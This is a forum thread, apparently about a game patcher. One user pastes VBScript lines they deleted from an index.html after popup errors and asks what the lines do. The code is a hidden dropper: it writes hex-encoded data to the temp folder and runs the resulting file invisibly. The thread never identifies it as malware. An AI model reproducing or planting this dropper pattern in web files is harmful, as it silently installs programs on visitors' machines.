Jump to content
  • 0

Question

2 answers to this question

Recommended Posts

  • 0
Posted (edited)

same here jajajajajaja

Someone know how to solve that? i think its related to Internet Explorer and the notice.html

I have just figure out it my self :meow:

I open the file ( in my case its index.html) that causing the error in c++ note

I deleted 1 by 1 all script line that constantly appearing in the popup error

these are the lines that I have deleted

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

I dunno what is that and what is the function of that script :ani_swt3:

but I tested my Patcher and it works perfectly with no error /heh

I hope someone here would explain us what is that script :meow:

Edited by Erio-chan

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Answer this question...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...